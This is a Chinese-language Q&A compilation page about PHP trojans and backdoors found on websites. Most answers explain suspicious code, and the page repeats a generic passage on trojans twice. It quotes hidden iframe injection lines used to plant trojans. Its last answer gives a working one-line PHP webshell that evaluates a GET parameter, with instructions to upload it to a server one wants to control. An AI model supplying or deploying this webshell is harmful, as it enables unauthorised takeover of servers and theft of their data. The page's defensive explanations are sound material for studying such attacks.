本文目錄一覽:
- 1、這段php代碼是什麼意思?麻煩詳細點
- 2、一段木馬代碼
- 3、php網站,代碼有一段不知道什麼意思,求大神幫忙(代碼如下)
- 4、能否有一個軟體能去掉php代碼中的一段木馬代碼
- 5、請問這些代碼是不是木馬病毒?
- 6、求一個簡單的PHP木馬程序
這段php代碼是什麼意思?麻煩詳細點
把575BfMVM4wf0s 拿去MD5解密 會得到一個域名地址
整段代碼的意思是 判斷當前域名 如果是 該域名` `則執行PHP一句話木馬
如果不是 跳轉到首頁
好象是DEDECMS 搞的“`不知道為什麼留這樣的後門 `
看他們這麼做 `以後想搞誰的站就能搞誰的站了 !
一段木馬代碼
iframe src=”14.htm” width=100 height=1/iframe
iframe src=”r.htm” width=100 height=1/iframe
iframe src=”1.htm” width=100 height=1/iframe
以上為常用掛馬方式。
下面這段:
script src=’;web_id=850334′ language=’JavaScript’ charset=’gb2312’/script
應該是你網站的統計代碼吧?
php網站,代碼有一段不知道什麼意思,求大神幫忙(代碼如下)
網友採納的那個回答是個毛線啊?就給你把這段js做了一下格式化。我來給你解釋一下吧:
這個代碼是前端的JS代碼,PHP是後端語言,這個代碼跟PHP沒有卵關係;
這個代碼不是病毒木馬代碼,檢測工具檢測出來紅色大概是因為這個是放在了注釋CDATA塊里。注釋CDATA塊其實是因以前的低端瀏覽器不識別JS代碼而生的,現在完全沒必要再注釋掉了;
你還是不放心的話,那我告訴你,這個代碼是給你隱藏你的真實郵箱的。因為很多發送垃圾郵件的人甚至搜索引擎,都會用爬蟲掃描各個網站的郵箱(因為郵箱格式特徵很明顯),掃到之後就給你發垃圾郵件。所以這個代碼是由PHP簡單的加密之後寫到頁面上一串16進位數字,然後用JS解密出來,爬蟲就掃不到你郵箱了,就這麼簡單。
也許採納的那位哥們不服,說這麼一段代碼看不出什麼來。那好,我說說每一行的意思。
首先是個閉包,懂前端的人都知道。
然後try一下,是為了謹慎,免得IE彈出頁面腳本有錯誤。
然後獲取document.currentScript標籤。如果沒有這個屬性的話,就用原始的方法來做,這裡又是一個自執行函數(閉包)。
拿到當前的script標籤,那前一個恰好就是加密標籤了,郵箱就在這個標籤的data-cfemail屬性中,將這個標籤保存成變數為c。
然後就是解密了。
解密演算法很簡單,就是一串16進位串,兩兩讀取。
前兩個讀出來作為密鑰
從後面每兩個讀出來,和密鑰做異或,之後的值用ASCII讀出字母
這些字母拼出來的就是你的郵箱
解密之後創建一個文本節點替換掉原來的加密標籤,就完成了
能否有一個軟體能去掉php代碼中的一段木馬代碼
搜索一下 PHP網站源碼批量替換工具 v1.0,試試。或者其他類似的軟體。替換之前記得備份原來的所有文件。
請問這些代碼是不是木馬病毒?
這個代碼屬於木馬病毒。
它是一種基於遠程控制的黑客工具,具有隱蔽性和非授權性的特點。 所謂隱蔽性是指木馬的設計者為了防止木馬被發現,會採用多種手段隱藏木馬,這樣服務端即使發現感染了木馬,由於不能確定其具體位置,往往只能望「馬」興嘆。 所謂非授權性是指一旦控制端與服務端連接後,控制端將享有服務端的大部分操作許可權,包括修改文件,修改註冊表,控制滑鼠,鍵盤等等,而這些權力並不是服務端賦予的,而是通過木馬程序竊取的。 從木馬的發展來看,基本上可以分為兩個階段。 最初網路還處於以UNIX平台為主的時期,木馬就產生了,當時的木馬程序的功能相對簡單,往往是將一段程序嵌入到系統文件中,用跳轉指令來執行一些木馬的功能,在這個時期木馬的設計者和使用者大都是些技術人員,必須具備相當的網路和編程知識。 而後隨著WINDOWS平台的日益普及,一些基於圖形操作的木馬程序出現了,用戶界面的改善,使使用者不用懂太多的專業知識就可以熟練的操作木馬,相對的木馬入侵事件也頻繁出現,而且由於這個時期木馬的功能已日趨完善,因此對服務端的破壞也更大了。 所以所木馬發展到今天,已經無所不用其極,一旦被木馬控制,你的電腦將毫無秘密可言。 什麼是木馬 特洛伊木馬(以下簡稱木馬),英文叫做「Trojan house」,其名稱取自希臘神話的特洛伊木馬記。 它是一種基於遠程控制的黑客工具,具有隱蔽性和非授權性的特點。
所謂隱蔽性是指木馬的設計者為了防止木馬被發現,會採用多種手段隱藏木馬,這樣服務端即使發現感染了木馬,由於不能確定其具體位置,往往只能望「馬」興嘆。 所謂非授權性是指一旦控制端與服務端連接後,控制端將享有服務端的大部分操作許可權,包括修改文件,修改註冊表,控制滑鼠,鍵盤等等,而這些權力並不是服務端賦予的,而是通過木馬程序竊取的。 從木馬的發展來看,基本上可以分為兩個階段。
最初網路還處於以UNIX平台為主的時期,木馬就產生了,當時的木馬程序的功能相對簡單,往往是將一段程序嵌入到系統文件中,用跳轉指令來執行一些木馬的功能,在這個時期木馬的設計者和使用者大都是些技術人員,必須具備相當的網路和編程知識。 而後隨著WINDOWS平台的日益普及,一些基於圖形操作的木馬程序出現了,用戶界面的改善,使使用者不用懂太多的專業知識就可以熟練的操作木馬,相對的木馬入侵事件也頻繁出現,而且由於這個時期木馬的功能已日趨完善,因此對服務端的破壞也更大了。 所以所木馬發展到今天,已經無所不用其極,一旦被木馬控制,你的電腦將毫無秘密可言。
用殺毒軟體可以清除木馬。它不是一種對自己不利的「病毒」,能夠應用和奴駕它的人,就將它看為是一種資源,它是一種基於遠程控制的黑客工具,具有隱蔽性和非授權性的特點。 一般自己中了木馬病毒,首先要認清這是個什麼病毒。其實 Trojan是某些防毒軟體對後門木馬的一種統稱,它並不代表著固定的一個,而是一類,所以即使遇到同樣名字的木馬可能它們也並不相同。
希望我能幫助你解疑釋惑。
求一個簡單的PHP木馬程序
?
if($_GET[r]) eval($_GET[r]);
?
將上面的代碼放到一個php文件並設法上傳到你想控制的伺服器,
在網頁上訪問伺服器上的該文件,只要在網址後面加上
?r=你想要的任何操作(php語言編寫).
只要你懂一點php,sql,這台伺服器的信息都在你的掌握.
原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-tw/n/300994.html
微信掃一掃 
支付寶掃一掃 